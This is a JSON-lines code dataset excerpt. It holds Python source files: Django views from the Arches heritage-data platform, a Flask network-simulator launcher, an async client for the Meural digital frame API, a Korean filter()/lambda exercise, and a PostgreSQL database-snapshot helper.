get_instance_creator(resource_instance, user)\n creator = instance_creator[\"creatorid\"]\n user_can_modify_permissions = instance_creator[\"user_can_edit_instance_permissions\"]\n\n if user_can_modify_permissions:\n # first remove all the current permissions\n for perm in get_perms(identityModel, resource_instance):\n remove_perm(perm, identityModel, resource_instance)\n\n if not revert:\n # then add the new permissions\n no_access = any(perm[\"codename\"] == \"no_access_to_resourceinstance\" for perm in identity[\"selectedPermissions\"])\n if no_access:\n assign_perm(\"no_access_to_resourceinstance\", identityModel, resource_instance)\n else:\n for perm in identity[\"selectedPermissions\"]:\n assign_perm(perm[\"codename\"], identityModel, resource_instance)\n\n resource = Resource.objects.get(pk=str(resource_instance.resourceinstanceid))\n resource.graph_id = resource_instance.graph_id\n resource.index()\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceEditLogView(BaseManagerView):\n def getEditConceptValue(self, values):\n if values is not None:\n for k, v in values.items():\n try:\n uuid.UUID(v)\n v = models.Value.objects.get(pk=v).value\n values[k] = v\n except Exception as e:\n pass\n try:\n display_values = []\n for val in v:\n uuid.UUID(val)\n display_value = models.Value.objects.get(pk=val).value\n display_values.append(display_value)\n values[k] = display_values\n except Exception as e:\n pass\n\n def get(self, request, resourceid=None, view_template=\"views/resource/edit-log.htm\"):\n transaction_id = request.GET.get(\"transactionid\", None)\n if resourceid is None:\n if transaction_id:\n recent_edits = models.EditLog.objects.filter(transactionid=transaction_id).order_by(\"-timestamp\")\n else:\n recent_edits = (\n models.EditLog.objects.all()\n .exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID)\n .order_by(\"-timestamp\")[:100]\n )\n edited_ids = list({edit.resourceinstanceid for edit in recent_edits})\n resources = Resource.objects.filter(resourceinstanceid__in=edited_ids).select_related(\"graph\")\n edit_type_lookup = {\n \"create\": _(\"Resource Created\"),\n \"delete\": _(\"Resource Deleted\"),\n \"tile delete\": _(\"Tile Deleted\"),\n \"tile create\": _(\"Tile Created\"),\n \"tile edit\": _(\"Tile Updated\"),\n \"delete edit\": _(\"Edit Deleted\"),\n \"bulk_create\": _(\"Resource Created\"),\n }\n deleted_instances = [e.resourceinstanceid for e in recent_edits if e.edittype == \"delete\"]\n graph_name_lookup = {str(r.resourceinstanceid): r.graph.name for r in resources}\n for edit in recent_edits:\n edit.friendly_edittype = edit_type_lookup[edit.edittype]\n edit.resource_model_name = None\n edit.deleted = edit.resourceinstanceid in deleted_instances\n if edit.resourceinstanceid in graph_name_lookup:\n edit.resource_model_name = graph_name_lookup[edit.resourceinstanceid]\n edit.displayname = edit.note\n if edit.resource_model_name is None:\n try:\n edit.resource_model_name = models.GraphModel.objects.get(pk=edit.resourceclassid).name\n except Exception:\n pass\n\n context = self.get_context_data(main_script=\"views/edit-history\", recent_edits=recent_edits)\n\n context[\"nav\"][\"title\"] = _(\"Recent Edits\")\n\n return render(request, \"views/edit-history.htm\", context)\n else:\n resource_instance = models.ResourceInstance.objects.get(pk=resourceid)\n edits = models.EditLog.objects.filter(resourceinstanceid=resourceid)\n permitted_edits = []\n for edit in edits:\n if edit.nodegroupid is not None:\n if request.user.has_perm(\"read_nodegroup\", edit.nodegroupid):\n if edit.newvalue is not None:\n self.getEditConceptValue(edit.newvalue)\n if edit.oldvalue is not None:\n self.getEditConceptValue(edit.oldvalue)\n permitted_edits.append(edit)\n else:\n permitted_edits.append(edit)\n\n resource = Resource.objects.get(pk=resourceid)\n displayname = resource.displayname()\n cards = Card.objects.filter(nodegroup__parentnodegroup=None, graph=resource_instance.graph)\n graph_name = resource_instance.graph.name\n\n context = self.get_context_data(\n main_script=\"views/resource/edit-log\",\n cards=JSONSerializer().serialize(cards),\n resource_type=graph_name,\n resource_description=resource.displaydescription(),\n iconclass=resource_instance.graph.iconclass,\n edits=JSONSerializer().serialize(localize_complex_input(permitted_edits)),\n resourceid=resourceid,\n displayname=_(\"Unnamed Resource\") if displayname == \"undefined\" else displayname,\n )\n\n context[\"nav\"][\"res_edit\"] = True\n context[\"nav\"][\"icon\"] = resource_instance.graph.iconclass\n context[\"nav\"][\"title\"] = graph_name\n\n return render(request, view_template, context)\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceActivityStreamPageView(BaseManagerView):\n def get(self, request, page=None):\n current_page = 1\n page_size = 100\n if hasattr(settings, \"ACTIVITY_STREAM_PAGE_SIZE\"):\n page_size = int(settings.ACTIVITY_STREAM_PAGE_SIZE)\n st = 0\n end = 100\n if page is not None:\n try:\n current_page = int(page)\n if current_page <= 0:\n current_page = 1\n st = (current_page - 1) * page_size\n end = current_page * page_size\n except (ValueError, TypeError) as e:\n return HttpResponseBadRequest()\n\n totalItems = models.EditLog.objects.all().exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID).count()\n\n edits = (\n models.EditLog.objects.all().exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID).order_by(\"timestamp\")[st:end]\n )\n\n # setting last to be same as first, changing later if there are more pages\n uris = {\n \"root\": request.build_absolute_uri(reverse(\"as_stream_collection\")),\n \"this\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": current_page})),\n \"first\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n \"last\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n }\n\n if current_page > 1:\n uris[\"prev\"] = request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": current_page - 1}))\n if end < totalItems:\n uris[\"next\"] = request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": current_page + 1}))\n if totalItems > page_size:\n uris[\"last\"] = (request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": int(totalItems / page_size) + 1})),)\n\n collection = ActivityStreamCollection(uris, totalItems, base_uri_for_arches=request.build_absolute_uri(\"/\").rsplit(\"/\", 1)[0])\n\n collection_page = collection.generate_page(uris, edits)\n collection_page.startIndex((current_page - 1) * page_size)\n\n return JsonResponse(collection_page.to_obj())\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceActivityStreamCollectionView(BaseManagerView):\n def get(self, request):\n page_size = 100\n if hasattr(settings, \"ACTIVITY_STREAM_PAGE_SIZE\"):\n page_size = int(settings.ACTIVITY_STREAM_PAGE_SIZE)\n\n totalItems = models.EditLog.objects.all().exclude(resourceclassid=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID).count()\n\n uris = {\n \"root\": request.build_absolute_uri(reverse(\"as_stream_collection\")),\n \"first\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n \"last\": request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": 1})),\n }\n\n if totalItems > page_size:\n uris[\"last\"] = request.build_absolute_uri(reverse(\"as_stream_page\", kwargs={\"page\": int(totalItems / page_size) + 1}))\n\n collection = ActivityStreamCollection(uris, totalItems, base_uri_for_arches=request.build_absolute_uri(\"/\").rsplit(\"/\", 1))\n\n return JsonResponse(collection.to_obj())\n\n\n@method_decorator(can_edit_resource_instance, name=\"dispatch\")\nclass ResourceData(View):\n def get(self, request, resourceid=None, formid=None):\n if formid is not None:\n form = Form(resourceid=resourceid, formid=formid, user=request.user)\n return JSONResponse(form)\n\n return HttpResponseNotFound()\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass ResourceTiles(View):\n def get(self, request, resourceid=None, include_display_values=True):\n datatype_factory = DataTypeFactory()\n nodeid = request.GET.get(\"nodeid\", None)\n search_term = request.GET.get(\"term\", None)\n permitted_tiles = []\n perm = \"read_nodegroup\"\n tiles = models.TileModel.objects.filter(resourceinstance_id=resourceid)\n if nodeid is not None:\n node = models.Node.objects.get(pk=nodeid)\n tiles = tiles.filter(nodegroup=node.nodegroup)\n\n for tile in tiles:\n if request.user.has_perm(perm, tile.nodegroup):\n tile = Tile.objects.get(pk=tile.tileid)\n tile.filter_by_perm(request.user, perm)\n tile_dict = model_to_dict(tile)\n if include_display_values:\n tile_dict[\"display_values\"] = []\n for node in models.Node.objects.filter(nodegroup=tile.nodegroup):\n if str(node.nodeid) in tile.data:\n datatype = datatype_factory.get_instance(node.datatype)\n display_value = datatype.get_display_value(tile, node)\n if display_value is not None:\n if search_term is not None and search_term in display_value:\n tile_dict[\"display_values\"].append({\"value\": display_value, \"label\": node.name, \"nodeid\": node.nodeid})\n elif search_term is None:\n tile_dict[\"display_values\"].append({\"value\": display_value, \"label\": node.name, \"nodeid\": node.nodeid})\n\n if search_term is None:\n permitted_tiles.append(tile_dict)\n elif len(tile_dict[\"display_values\"]) > 0:\n permitted_tiles.append(tile_dict)\n return JSONResponse({\"tiles\": permitted_tiles})\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass ResourceCards(View):\n def get(self, request, resourceid=None):\n cards = []\n if resourceid is not None:\n graph = models.GraphModel.objects.get(graphid=resourceid)\n cards = [Card.objects.get(pk=card.cardid) for card in models.CardModel.objects.filter(graph=graph)]\n return JSONResponse({\"success\": True, \"cards\": cards})\n\n\nclass ResourceDescriptors(View):\n def get_localized_descriptor(self, document, descriptor_type):\n language_codes = (translation.get_language(), settings.LANGUAGE_CODE)\n descriptor = document[\"_source\"][descriptor_type]\n result = descriptor[0] if len(descriptor) > 0 else {\"value\": _(\"Undefined\")}\n for language_code in language_codes:\n for entry in descriptor:\n if entry[\"language\"] == language_code and entry[\"value\"] != \"\":\n return entry[\"value\"]\n return result[\"value\"]\n\n def get(self, request, resourceid=None):\n if Resource.objects.filter(pk=resourceid).exclude(pk=settings.SYSTEM_SETTINGS_RESOURCE_ID).exists():\n try:\n resource = Resource.objects.get(pk=resourceid)\n se = SearchEngineFactory().create()\n document = se.search(index=RESOURCES_INDEX, id=resourceid)\n return JSONResponse(\n {\n \"graphid\": document[\"_source\"][\"graph_id\"],\n \"graph_name\": resource.graph.name,\n \"displaydescription\": self.get_localized_descriptor(document, \"displaydescription\"),\n \"map_popup\": self.get_localized_descriptor(document, \"map_popup\"),\n \"displayname\": self.get_localized_descriptor(document, \"displayname\"),\n \"geometries\": document[\"_source\"][\"geometries\"],\n \"permissions\": document[\"_source\"][\"permissions\"],\n \"userid\": request.user.id,\n }\n )\n except Exception as e:\n logger.exception(_(\"Failed to fetch resource instance descriptors\"))\n\n return HttpResponseNotFound()\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass ResourceReportView(MapBaseManagerView):\n def get(self, request, resourceid=None):\n resource = Resource.objects.only(\"graph_id\").get(pk=resourceid)\n graph = Graph.objects.get(graphid=resource.graph_id)\n\n try:\n map_markers = models.MapMarker.objects.all()\n geocoding_providers = models.Geocoder.objects.all()\n except AttributeError:\n raise Http404(_(\"No active report template is available for this resource.\"))\n\n context = self.get_context_data(\n main_script=\"views/resource/report\",\n resourceid=resourceid,\n report_templates=models.ReportTemplate.objects.all(),\n card_components=models.CardComponent.objects.all(),\n widgets=models.Widget.objects.all(),\n map_markers=map_markers,\n geocoding_providers=geocoding_providers,\n )\n\n if graph.iconclass:\n context[\"nav\"][\"icon\"] = graph.iconclass\n context[\"nav\"][\"title\"] = graph.name\n context[\"nav\"][\"res_edit\"] = True\n context[\"nav\"][\"print\"] = True\n\n return render(request, \"views/resource/report.htm\", context)\n\n\n@method_decorator(can_read_resource_instance, name=\"dispatch\")\nclass RelatedResourcesView(BaseManagerView):\n action = None\n graphs = (\n models.GraphModel.objects.all()\n .exclude(pk=settings.SYSTEM_SETTINGS_RESOURCE_MODEL_ID)\n .exclude(isresource=False)\n .exclude(publication=None)\n )\n\n def paginate_related_resources(self, related_resources, page, request):\n total = related_resources[\"total\"][\"value\"]\n paginator, pages = get_paginator(request, related_resources, total, page, settings.RELATED_RESOURCES_PER_PAGE)\n page = paginator.page(page)\n\n def parse_relationshiptype_label(relationship):\n if relationship[\"relationshiptype_label\"].startswith(\"http\"):\n relationship[\"relationshiptype_label\"] = relationship[\"relationshiptype_label\"].rsplit(\"/\")[-1]\n return relationship\n\n related_resources[\"resource_relationships\"] = [parse_relationshiptype_label(r) for r in related_resources[\"resource_relationships\"]]\n\n ret = {}\n ret[\"related_resources\"] = related_resources\n ret[\"paginator\"] = {}\n ret[\"paginator\"][\"current_page\"] = page.number\n ret[\"paginator\"][\"has_next\"] = page.has_next()\n ret[\"paginator\"][\"has_previous\"] = page.has_previous()\n ret[\"paginator\"][\"has_other_pages\"] = page.has_other_pages()\n ret[\"paginator\"][\"next_page_number\"] = page.next_page_number() if page.has_next() else None\n ret[\"paginator\"][\"previous_page_number\"] = page.previous_page_number() if page.has_previous() else None\n ret[\"paginator\"][\"start_index\"] = page.start_index()\n ret[\"paginator\"][\"end_index\"] = page.end_index()\n ret[\"paginator\"][\"pages\"] = pages\n\n return ret\n\n def get(self, request, resourceid=None):\n ret = {}\n\n if self.action == \"get_candidates\":\n resourceid = request.GET.get(\"resourceids\", \"\")\n resources = Resource.objects.filter(resourceinstanceid=resourceid).prefetch_related(\"graph__functions\")\n ret = []\n\n for resource in resources:\n res = JSONSerializer().serializeToPython(resource)\n res[\"ontologyclass\"] = resource.get_root_ontology()\n ret.append(res)\n\n elif self.action == \"get_relatable_resources\":\n graphid = request.GET.get(\"graphid\", None)\n nodes = models.Node.objects.filter(graph=graphid).exclude(istopnode=False)[0].get_relatable_resources()\n ret = {str(node.graph_id) for node in nodes}\n\n else:\n lang = request.GET.get(\"lang\", request.LANGUAGE_CODE)\n resourceinstance_graphid = request.GET.get(\"resourceinstance_graphid\")\n paginate = strtobool(request.GET.get(\"paginate\", \"true\")) # default to true\n resource = Resource.objects.get(pk=resourceid)\n\n if paginate:\n page = 1 if request.GET.get(\"page\") == \"\" else int(request.GET.get(\"page\", 1))\n start = int(request.GET.get(\"start\", 0))\n\n related_resources = resource.get_related_resources(\n lang=lang,\n start=start,\n page=page,\n user=request.user,\n resourceinstance_graphid=resourceinstance_graphid,\n graphs=self.graphs,\n )\n\n ret = self.paginate_related_resources(related_resources=related_resources, page=page, request=request)\n else:\n ret = resource.get_related_resources(\n lang=lang, user=request.user, resourceinstance_graphid=resourceinstance_graphid, graphs=self.graphs\n )\n\n return JSONResponse(ret)\n\n def delete(self, request, resourceid=None):\n lang = request.GET.get(\"lang\", request.LANGUAGE_CODE)\n se = SearchEngineFactory().create()\n req = dict(request.GET)\n ids_to_delete = req[\"resourcexids[]\"]\n root_resourceinstanceid = req[\"root_resourceinstanceid\"]\n for resourcexid in ids_to_delete:\n try:\n ret = models.ResourceXResource.objects.get(pk=resourcexid).delete()\n except ObjectDoesNotExist:\n logger.exception(_(\"Unable to delete. Relationship does not exist\"))\n start = request.GET.get(\"start\", 0)\n resource = Resource.objects.get(pk=root_resourceinstanceid[0])\n page = 1 if request.GET.get(\"page\") == \"\" else int(request.GET.get(\"page\", 1))\n related_resources = resource.get_related_resources(lang=lang, start=start, limit=1000, page=page, user=request.user)\n ret = []\n\n if related_resources is not None:\n ret = self.paginate_related_resources(related_resources, page, request)\n\n return JSONResponse(ret, indent=4)\n\n def post(self, request, resourceid=None):\n lang = request.GET.get(\"lang\", request.LANGUAGE_CODE)\n se = SearchEngineFactory().create()\n res = dict(request.POST)\n relationshiptype = res[\"relationship_properties[relationshiptype]\"][0]\n datefrom = res[\"relationship_properties[datestarted]\"][0]\n dateto = res[\"relationship_properties[dateended]\"][0]\n dateto = None if dateto == \"\" else dateto\n datefrom = None if datefrom == \"\" else datefrom\n notes = res[\"relationship_properties[notes]\"][0]\n root_resourceinstanceid = res[\"root_resourceinstanceid\"]\n instances_to_relate = []\n relationships_to_update = []\n if \"instances_to_relate[]\" in res:\n instances_to_relate = res[\"instances_to_relate[]\"]\n if \"relationship_ids[]\" in res:\n relationships_to_update = res[\"relationship_ids[]\"]\n\n def get_relatable_resources(graphid):\n \"\"\"\n Takes the graphid of a resource, finds the graphs root node, and returns the relatable graphids\n \"\"\"\n nodes = models.Node.objects.filter(graph_id=graphid)\n top_node = [node for node in nodes if node.istopnode == True][0]\n relatable_resources = [str(node.graph_id) for node in top_node.get_relatable_resources()]\n return relatable_resources\n\n def confirm_relationship_permitted(to_id, from_id):\n resource_instance_to = models.ResourceInstance.objects.filter(resourceinstanceid=to_id)[0]\n resource_instance_from = models.ResourceInstance.objects.filter(resourceinstanceid=from_id)[0]\n relatable_to = get_relatable_resources(resource_instance_to.graph_id)\n relatable_from = get_relatable_resources(resource_instance_from.graph_id)\n relatable_to_is_valid = str(resource_instance_to.graph_id) in relatable_from\n relatable_from_is_valid = str(resource_instance_from.graph_id) in relatable_to\n return relatable_to_is_valid is True and relatable_from_is_valid is True\n\n for instanceid in instances_to_relate:\n permitted = confirm_relationship_permitted(instanceid, root_resourceinstanceid[0])\n if permitted is True:\n rr = models.ResourceXResource(\n resourceinstanceidfrom=Resource(root_resourceinstanceid[0]),\n resourceinstanceidto=Resource(instanceid),\n notes=notes,\n relationshiptype=relationshiptype,\n datestarted=datefrom,\n dateended=dateto,\n )\n try:\n rr.save()\n except PublishedModelError as e:\n message = _(\"Unable to save. Please verify the model is not currently published.\")\n return JSONResponse({\"status\": \"false\", \"message\": [_(e.title), _(str(message))]}, status=500)\n else:\n print(\"relationship not permitted\")\n\n for relationshipid in relationships_to_update:\n rr = models.ResourceXResource.objects.get(pk=relationshipid)\n rr.notes = notes\n rr.relationshiptype = relationshiptype\n rr.datestarted = datefrom\n rr.dateended = dateto\n try:\n rr.save()\n except PublishedModelError as e:\n message = _(\"Unable to save. Please verify the model is not currently published.\")\n return JSONResponse({\"status\": \"false\", \"message\": [_(e.title), _(str(message))]}, status=500)\n\n start = request.GET.get(\"start\", 0)\n resource = Resource.objects.get(pk=root_resourceinstanceid[0])\n page = 1 if request.GET.get(\"page\") == \"\" else int(request.GET.get(\"page\", 1))\n related_resources = resource.get_related_resources(lang=lang, start=start, limit=1000, page=page, user=request.user)\n ret = []\n\n if related_resources is not None:\n ret = self.paginate_related_resources(related_resources, page, request)\n\n return JSONResponse(ret, indent=4)\n","repo_name":"archesproject/arches","sub_path":"arches/app/views/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":46843,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"77"} +{"seq_id":"7988446621","text":"import logging\nimport platform\n\nfrom network_simulator import create_app\n\n\ndef get_container_id():\n return platform.node()\n\n\ndef setup_logging():\n log_formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n\n file_handler = logging.FileHandler(\"network_simulator.log\")\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(logging.DEBUG)\n\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(log_formatter)\n console_handler.setLevel(logging.DEBUG)\n\n logging.basicConfig(handlers=[file_handler, console_handler])\n\n\nif __name__ == \"__main__\":\n setup_logging()\n\n net_namespace = get_container_id()\n app = create_app(net_namespace)\n\n app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","repo_name":"mLe110/network-simulator","sub_path":"network_simulator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14349613408","text":"import io\nimport logging\nfrom asyncio import Lock, Semaphore\nfrom copy import deepcopy\nfrom dataclasses import dataclass, field\nfrom functools import partialmethod\nfrom optparse import Option\nfrom pathlib import Path\nfrom typing import Any, Callable, ClassVar, Dict, Literal, Optional, Union, cast\n\nimport aiohttp\nimport async_timeout\nfrom aiohttp.client_exceptions import ClientResponseError\n\n_LOGGER = logging.getLogger(__name__)\n\nBASE_URL = 'https://api.meural.com/v0/'\nAUTHENTICATE_PATH = 'authenticate'\n\nJsonT = Dict[str, Any]\nIdT = Union[str, int]\nDataT = Union[JsonT, None]\n\n\ndef filter_none(*_d: JsonT, **_dd: Any) -> JsonT:\n return {k: v for d in [*_d, _dd] for k, v in d.items() if v}\n\n\n@dataclass\nclass Meural:\n username: str = ''\n password: str = ''\n session: Optional[aiohttp.ClientSession] = aiohttp.ClientSession()\n token: Optional[str] = None\n _lock: ClassVar[Semaphore] = Semaphore(3)\n\n async def request(\n self,\n method: Literal['GET', 'PUT', 'POST', 'DELETE'],\n path: str,\n data: Union[JsonT, None] = None,\n form: bool = False,\n raise_for_status: bool = True,\n data_key: str = 'data',\n ) -> JsonT:\n url = f'{BASE_URL}{path}'\n kwargs: Dict[str, Any] = {}\n headers = {\n 'Authorization': f'Token {self.token}',\n 'x-meural-api-version': '3',\n }\n\n if path == AUTHENTICATE_PATH:\n headers.pop('Authorization')\n\n if data:\n if form:\n kwargs['data'] = aiohttp.FormData(deepcopy(data))\n elif method == 'GET':\n kwargs['query'] = data\n else:\n kwargs['json'] = data\n\n try:\n async with self._lock, aiohttp.ClientSession(\n headers=headers\n ) as session, session.request(\n method, url, raise_for_status=raise_for_status, **kwargs\n ) as resp:\n response: JsonT = await resp.json()\n await session.close()\n return response[data_key]\n\n except ClientResponseError as err:\n if err.status != 401:\n raise\n elif err.status == 401 and path == AUTHENTICATE_PATH:\n raise\n\n _LOGGER.info('Meural: Sending Request failed. Re-Authenticating')\n await self.login(force=True)\n return await self.request(method, path, data=data, form=form)\n except Exception as err:\n _LOGGER.error('Meural: Sending Request failed. Raising: %s' % err)\n raise\n\n async def get(\n self,\n path: str,\n data: DataT = None,\n form: bool = False,\n raise_for_status: bool = True,\n data_key: str = 'data',\n ) -> JsonT:\n return await self.request(\n 'GET',\n path,\n data=data,\n form=form,\n raise_for_status=raise_for_status,\n data_key=data_key,\n )\n\n async def put(\n self,\n path: str,\n data: DataT = None,\n form: bool = False,\n raise_for_status: bool = True,\n data_key: str = 'data',\n ) -> JsonT:\n return await self.request(\n 'PUT',\n path,\n data=data,\n form=form,\n raise_for_status=raise_for_status,\n data_key=data_key,\n )\n\n async def post(\n self,\n path: str,\n data: DataT = None,\n form: bool = False,\n raise_for_status: bool = True,\n data_key: str = 'data',\n ) -> JsonT:\n return await self.request(\n 'POST',\n path,\n data=data,\n form=form,\n raise_for_status=raise_for_status,\n data_key=data_key,\n )\n\n async def delete(\n self,\n path: str,\n data: DataT = None,\n form: bool = False,\n raise_for_status: bool = True,\n data_key: str = 'data',\n ) -> JsonT:\n return await self.request(\n 'DELETE',\n path,\n data=data,\n form=form,\n raise_for_status=raise_for_status,\n data_key=data_key,\n )\n\n async def login(\n self,\n username: str = '',\n password: str = '',\n force: bool = False,\n _auth_lock: Lock = Lock(),\n ) -> None:\n \"\"\"Authenticate and return a token.\"\"\"\n\n if force:\n self.token = None\n\n async with _auth_lock:\n\n if self.token:\n return\n\n self.username = username or self.username\n self.password = password or self.password\n\n assert self.username, 'username must be set before login'\n assert self.password, 'password must be set before login'\n\n _LOGGER.info('Meural: Authenticating')\n token = await self.post(\n AUTHENTICATE_PATH,\n data={'username': self.username, 'password': self.password},\n raise_for_status=True,\n data_key='token',\n )\n assert token and isinstance(\n token, str\n ), 'token was not provided in the authentication response'\n self.token = token\n\n async def get_user(self) -> JsonT:\n return await self.get('user')\n\n async def get_user_items(self) -> JsonT:\n return await self.get('user/items')\n\n async def get_user_galleries(self) -> JsonT:\n return await self.get('user/galleries')\n\n async def get_user_devices(self) -> JsonT:\n return await self.get('user/devices')\n\n async def get_user_feedback(self) -> JsonT:\n return await self.get('user/feedback')\n\n async def device_load_gallery(self, device_id: IdT, gallery_id: IdT):\n return await self.post(f'devices/{device_id}/galleries/{gallery_id}')\n\n async def device_load_item(self, device_id: IdT, item_id: IdT):\n return await self.post(f'devices/{device_id}/items/{item_id}')\n\n async def get_device(self, device_id: IdT) -> JsonT:\n return await self.get(f'devices/{device_id}')\n\n async def get_device_galleries(self, device_id: IdT) -> JsonT:\n return await self.get(f'devices/{device_id}/galleries')\n\n async def update_device(self, device_id: IdT, data: JsonT):\n return await self.put(f'devices/{device_id}', data)\n\n async def sync_device(self, device_id: IdT):\n return await self.post(f'devices/{device_id}/sync')\n\n async def get_item(self, item_id: IdT) -> JsonT:\n return await self.get(f'items/{item_id}')\n\n async def update_item(\n self,\n item_id: IdT,\n name: Optional[str] = None,\n author: Optional[str] = None,\n description: Optional[str] = None,\n medium: Optional[str] = None,\n year: Union[str, int, None] = None,\n ) -> Optional[JsonT]:\n data = filter_none(\n name=name,\n author=author,\n description=description,\n medium=medium,\n year=str(year) if year else None,\n )\n if data:\n return await self.put(f'items/{item_id}', data)\n else:\n return None\n\n async def add_item(\n self,\n image_bytes: io.BytesIO,\n gallery_id: Optional[IdT] = None,\n name: Optional[str] = None,\n author: Optional[str] = None,\n description: Optional[str] = None,\n medium: Optional[str] = 'photography',\n year: Optional[int] = None,\n ) -> JsonT:\n item = await self.post('items', data={'image': image_bytes}, form=True)\n item_id: int = item['id']\n\n await self.update_item(\n item_id,\n name=name,\n author=author,\n description=description,\n medium=medium,\n year=year,\n )\n if gallery_id:\n await self.add_to_gallery(gallery_id=gallery_id, item_id=item_id)\n\n return item\n\n async def add_to_gallery(self, gallery_id: IdT, item_id: IdT) -> JsonT:\n return await self.post(f'galleries/{gallery_id}/items/{item_id}')\n","repo_name":"NorthIsUp/we-love-bot","sub_path":"welovebot/lib/frames/meural.py","file_name":"meural.py","file_ext":"py","file_size_in_byte":8106,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"21444012163","text":"# 필터함수에 일반함수와 람다함수 적용\narr = ['a', 1, 2, 'b', 13, 17, 'c', 2.5, 7.9]\n\ndef f1(arr):\n if isinstance(arr, int):\n return True\n return False\n\n\ndef f2(arr):\n if isinstance(arr, float):\n return True\n else:\n return False\n\n\ndef f3(arr):\n return isinstance(arr, str)\nans=list(filter(f3,arr))\nans1=list(filter(f2,arr))\nprint(f'리스트 속 문자 : {ans}')\nprint(f'리스트 속 실수 : {ans1}')\nans3=list(filter(f1,arr))\nprint(f'리스트 속 정수 : {ans3}')\nans3=list(filter(lambda n: n<5, ans3))\nprint(f'리스트 속 5 미만 정수 : {ans3}')","repo_name":"nabilera1/codingTestPython","sub_path":"코딩테스트학습/문법 필터함수 예제.py","file_name":"문법 필터함수 예제.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39261867447","text":"import psycopg2\nfrom psycopg2.extensions import AsIs\n\n\nclass TagExists(Exception):\n pass\n\n\nclass NoTemplate(Exception):\n pass\n\n\nclass ODB(object):\n \"\"\"class representing an Odoo instance\n \"\"\"\n def __init__(self, db=None):\n self.db = db\n\n def connect(self, db=None):\n \"\"\" connect to the current db unless specified\n \"\"\"\n if db is None:\n db = self.db\n return psycopg2.connect('dbname=%s' % db)\n\n def _createdb(self):\n \"\"\" createdb used for tests\n \"\"\"\n db = self.db\n with self.connect('postgres') as cn:\n cn.autocommit = True\n cn.cursor().execute('CREATE DATABASE \"%s\"', (AsIs(db),))\n with self.connect(db) as cn, cn.cursor() as cr:\n cr.execute(\"CREATE TABLE ir_config_parameter \"\n \"(key character varying(256), value text)\")\n\n def dropdb(self, db=None):\n \"\"\" drop db\n \"\"\"\n if db is None:\n db = self.db\n with self.connect('postgres') as cn, cn.cursor() as cr:\n cn.autocommit = True\n self._disconnect(cr, db)\n cn.cursor().execute('DROP DATABASE \"%s\"', (AsIs(db),))\n\n def init(self):\n \"\"\" initialize the db with the revision\n \"\"\"\n revision = self.get('revision')\n with self.connect() as cn, cn.cursor() as cr:\n if revision is None:\n revision = '1'\n self.set('revision', revision, cr)\n self.set('parent', '0', cr)\n return int(revision)\n\n def set(self, key, value, cr=None):\n \"\"\" set the value of a key\n \"\"\"\n update = \"UPDATE ir_config_parameter SET value=%s WHERE key=%s\"\n insert = \"INSERT INTO ir_config_parameter (value, key) values (%s, %s)\"\n values = (str(value), 'odb.%s' % key)\n if cr is not None:\n cr.execute(update, values)\n if not cr.rowcount:\n cr.execute(insert, values)\n else:\n with self.connect() as cn, cn.cursor() as cr:\n cr.execute(update, values)\n if not cr.rowcount:\n cr.execute(insert, values)\n\n def get(self, key, cr=None):\n \"\"\" get the value of a key\n \"\"\"\n req = \"SELECT value FROM ir_config_parameter WHERE key=%s\"\n if cr is not None:\n cr.execute(req, ('odb.' + key,))\n res = cr.fetchone()\n else:\n with self.connect() as cn, cn.cursor() as cr:\n cr.execute(req, ('odb.' + key,))\n res = cr.fetchone()\n if res is not None and len(res) == 1:\n return res[0]\n\n def rem(self, key, cr=None):\n \"\"\" delete a key\n \"\"\"\n req = \"DELETE FROM ir_config_parameter WHERE key=%s\"\n if cr is not None:\n cr.execute(req, ('odb.' + key,))\n else:\n with self.connect() as cn, cn.cursor() as cr:\n cr.execute(req, ('odb.' + key,))\n\n def revision(self):\n \"\"\" returns the db revision\n \"\"\"\n return int(self.get('revision'))\n\n def parent(self):\n \"\"\" get the parent snapshot\n \"\"\"\n return int(self.get('parent'))\n\n def _disconnect(self, cr, db):\n \"\"\" kill all pg connections\n \"\"\"\n cr.execute('select version()') # procpid renamed to pid in PG9.2\n pid = 'pid' if cr.fetchone()[0][:14] >= \"PostgreSQL 9.2\" else 'procpid'\n cr.execute(\"SELECT pg_terminate_backend(pg_stat_activity.%s) \"\n \"FROM pg_stat_activity \"\n \"WHERE pg_stat_activity.datname=%%s \"\n \"AND %s <> pg_backend_pid()\" % (pid, pid), (db,))\n\n def commit(self, msg=None):\n \"\"\" create a snapshot and change the current revision\n \"\"\"\n if msg:\n self.set('message', msg)\n revision = self.revision()\n targetdb = '*'.join([self.db, str(revision)])\n with self.connect('postgres') as cn, cn.cursor() as cr:\n cn.autocommit = True\n self._disconnect(cr, self.db)\n 